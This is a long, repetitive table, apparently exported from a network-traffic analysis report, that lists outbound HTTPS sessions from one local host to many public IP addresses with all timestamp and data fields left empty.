                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14149192.168.2.2341476207.132.10.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14150192.168.2.2334540149.72.66.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14151192.168.2.2348860178.141.3.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14152192.168.2.233654438.178.215.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14153192.168.2.2334816122.195.58.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14154192.168.2.2360366124.44.90.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14155192.168.2.233363839.71.84.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14156192.168.2.2345686134.169.70.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14157192.168.2.23400545.147.49.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14158192.168.2.2339472190.5.110.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14159192.168.2.235796282.214.91.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14160192.168.2.235470876.152.252.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14161192.168.2.2344442181.198.247.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14162192.168.2.233609870.127.238.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14163192.168.2.2348554187.247.150.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14164192.168.2.2352586122.11.180.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14165192.168.2.2357460108.244.91.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14166192.168.2.2335424149.149.21.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14167192.168.2.233847497.161.33.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14168192.168.2.2349638166.22.149.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14169192.168.2.234045880.84.108.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14170192.168.2.2351392190.247.169.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14171192.168.2.2351362169.62.71.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14172192.168.2.2336718210.9.125.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14173192.168.2.2360294194.252.96.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14174192.168.2.234476454.35.81.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14175192.168.2.2341328165.224.190.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14176192.168.2.2334696185.201.245.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14177192.168.2.2336116134.96.25.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14178192.168.2.2339092149.147.180.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14179192.168.2.2345930177.103.55.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14180192.168.2.2346968119.179.137.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14181192.168.2.234398876.184.212.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14182192.168.2.2349046221.121.73.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14183192.168.2.234718687.1.202.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14184192.168.2.234260476.145.156.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14185192.168.2.233301445.195.243.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14186192.168.2.2334770183.153.160.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14187192.168.2.2336178170.103.163.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14188192.168.2.234071436.45.79.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14189192.168.2.234165662.226.229.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14190192.168.2.235076063.215.205.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14191192.168.2.235100053.217.30.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14192192.168.2.234856034.95.217.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14193192.168.2.2340476146.107.214.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14194192.168.2.2352616183.87.155.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14195192.168.2.2341876197.222.168.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14196192.168.2.2336126172.77.202.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14197192.168.2.2340776130.21.167.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14198192.168.2.2352462184.56.170.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14199192.168.2.235810636.163.126.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14200192.168.2.234458874.68.72.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14201192.168.2.2347326177.98.145.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14202192.168.2.235548072.201.159.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14203192.168.2.234618258.221.149.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14204192.168.2.2359296107.44.247.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14205192.168.2.2344510182.51.94.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14206192.168.2.235545641.85.199.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14207192.168.2.2346090140.131.109.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14208192.168.2.2348378146.5.199.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14209192.168.2.2348406220.63.146.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14210192.168.2.2339280120.9.162.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14211192.168.2.2358242222.55.237.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14212192.168.2.2350276206.12.103.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14213192.168.2.234411817.188.46.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14214192.168.2.2347652183.171.214.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14215192.168.2.233683879.191.52.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14216192.168.2.236044824.96.52.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14217192.168.2.2341058203.227.150.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14218192.168.2.234151093.154.76.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14219192.168.2.2355760198.58.65.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14220192.168.2.2352982177.204.3.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14221192.168.2.234145043.149.213.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14222192.168.2.234459423.28.141.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14223192.168.2.2359164104.2.61.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14224192.168.2.2343204155.192.221.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14225192.168.2.233603425.41.33.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14226192.168.2.2333670166.230.86.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14227192.168.2.2353846141.139.158.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14228192.168.2.2356136166.220.155.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14229192.168.2.2355980159.210.59.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14230192.168.2.234869467.71.246.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14231192.168.2.2357488205.167.29.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14232192.168.2.2345800104.15.142.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14233192.168.2.2351854114.168.231.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14234192.168.2.233440047.219.43.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14235192.168.2.2356594193.239.82.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14236192.168.2.233914019.132.28.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14237192.168.2.234852892.210.106.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14238192.168.2.2348412102.253.47.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14239192.168.2.2348558148.190.8.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14240192.168.2.2336160106.239.71.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14241192.168.2.2357076113.26.214.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14242192.168.2.235997077.248.254.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14243192.168.2.2356536167.55.75.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14244192.168.2.2341906161.37.158.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14245192.168.2.2348934180.159.45.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14246192.168.2.234967612.28.110.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14247192.168.2.233514080.29.51.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14248192.168.2.235080878.146.110.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14249192.168.2.2350354196.168.176.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14250192.168.2.2358228144.55.196.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14251192.168.2.2342626222.25.202.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14252192.168.2.2337080194.118.206.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14253192.168.2.233300287.135.18.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14254192.168.2.233780840.177.106.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14255192.168.2.2344256177.212.216.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14256192.168.2.2335480134.137.120.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14257192.168.2.2344656102.61.210.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14258192.168.2.234060839.155.130.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14259192.168.2.2350608105.107.158.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14260192.168.2.2351598200.80.225.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14261192.168.2.2353078166.190.210.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14262192.168.2.2335676130.149.57.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14263192.168.2.233619683.24.111.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14264192.168.2.2338284208.239.89.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14265192.168.2.2340984128.181.241.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14266192.168.2.235384638.11.188.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14267192.168.2.2358568211.123.204.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14268192.168.2.235118614.227.149.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14269192.168.2.233738014.89.255.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14270192.168.2.233656634.138.199.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14271192.168.2.2336456201.152.87.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14272192.168.2.2347858160.169.40.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14273192.168.2.2349544109.172.15.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14274192.168.2.234313613.197.228.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14275192.168.2.2345354186.114.190.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14276192.168.2.233967831.251.8.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14277192.168.2.233486278.213.78.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14278192.168.2.2357978160.218.89.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14279192.168.2.234514845.30.134.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14280192.168.2.2355194147.79.121.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14281192.168.2.2340130179.65.145.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14282192.168.2.233562842.119.64.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14283192.168.2.235323825.155.253.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14284192.168.2.234975640.237.36.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14285192.168.2.2359436177.168.54.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14286192.168.2.234753487.236.212.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14287192.168.2.233717664.72.16.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14288192.168.2.2358790141.186.222.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14289192.168.2.233623032.62.109.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14290192.168.2.2344206219.87.4.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14291192.168.2.2341616203.143.146.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14292192.168.2.2358010138.2.48.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14293192.168.2.234007020.133.80.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14294192.168.2.234331240.37.249.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14295192.168.2.2343986136.180.226.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14296192.168.2.2351424136.195.203.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14297192.168.2.234666060.147.217.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14298192.168.2.2336358155.243.169.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14299192.168.2.2353784137.45.95.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14300192.168.2.235020238.77.159.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14301192.168.2.2350610165.62.49.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14302192.168.2.236043843.89.26.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14303192.168.2.233486444.79.108.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14304192.168.2.234215251.173.60.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14305192.168.2.2349904110.173.79.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14306192.168.2.2335994201.128.191.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14307192.168.2.2349498161.131.25.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14308192.168.2.2360688143.33.154.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14309192.168.2.236095662.179.240.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14310192.168.2.2335048158.52.61.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14311192.168.2.235400646.250.101.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14312192.168.2.233427892.114.67.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14313192.168.2.2354938205.144.65.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14314192.168.2.2336042100.34.247.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14315192.168.2.234802862.216.38.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14316192.168.2.235093245.181.152.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14317192.168.2.2348772136.88.161.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14318192.168.2.2354804177.91.148.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14319192.168.2.2358184223.123.162.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14320192.168.2.234745649.235.12.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14321192.168.2.2345416162.199.14.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14322192.168.2.234123831.160.187.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14323192.168.2.2352482105.79.71.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14324192.168.2.2338714196.187.84.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14325192.168.2.2336386156.98.164.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14326192.168.2.233411291.74.196.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14327192.168.2.2343250218.121.34.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14328192.168.2.2358444175.247.83.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14329192.168.2.234083651.17.72.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14330192.168.2.2337142125.207.86.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14331192.168.2.2339288172.70.244.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14332192.168.2.2336270186.93.47.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14333192.168.2.2334472177.42.201.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14334192.168.2.2345100166.21.6.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14335192.168.2.2358780183.98.12.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14336192.168.2.2353912216.227.31.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14337192.168.2.2352458167.167.155.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14338192.168.2.2355450207.159.137.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14339192.168.2.2358970104.236.211.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14340192.168.2.233372642.218.197.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14341192.168.2.234303060.94.53.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14342192.168.2.2333706179.26.182.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14343192.168.2.233610495.222.170.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14344192.168.2.233996858.250.0.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14345192.168.2.235182667.89.51.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14346192.168.2.2358138150.75.47.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14347192.168.2.233568235.3.173.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14348192.168.2.2360518154.218.107.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14349192.168.2.234436812.131.50.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14350192.168.2.234073864.10.153.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14351192.168.2.234196243.236.72.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14352192.168.2.234158242.117.98.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14353192.168.2.2333926161.58.68.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14354192.168.2.235200218.119.195.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14355192.168.2.235884647.46.58.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14356192.168.2.2351762190.219.64.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14357192.168.2.2355330138.200.14.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14358192.168.2.2355110174.18.246.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14359192.168.2.235199413.63.219.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14360192.168.2.2359782220.85.217.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14361192.168.2.2353040193.77.28.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14362192.168.2.234713495.216.2.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14363192.168.2.235682843.32.187.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14364192.168.2.235846694.51.45.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14365192.168.2.233884288.252.102.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14366192.168.2.2348406100.166.53.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14367192.168.2.2351986189.125.71.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14368192.168.2.235445895.89.74.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14369192.168.2.234540850.6.97.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14370192.168.2.234372865.231.159.8443
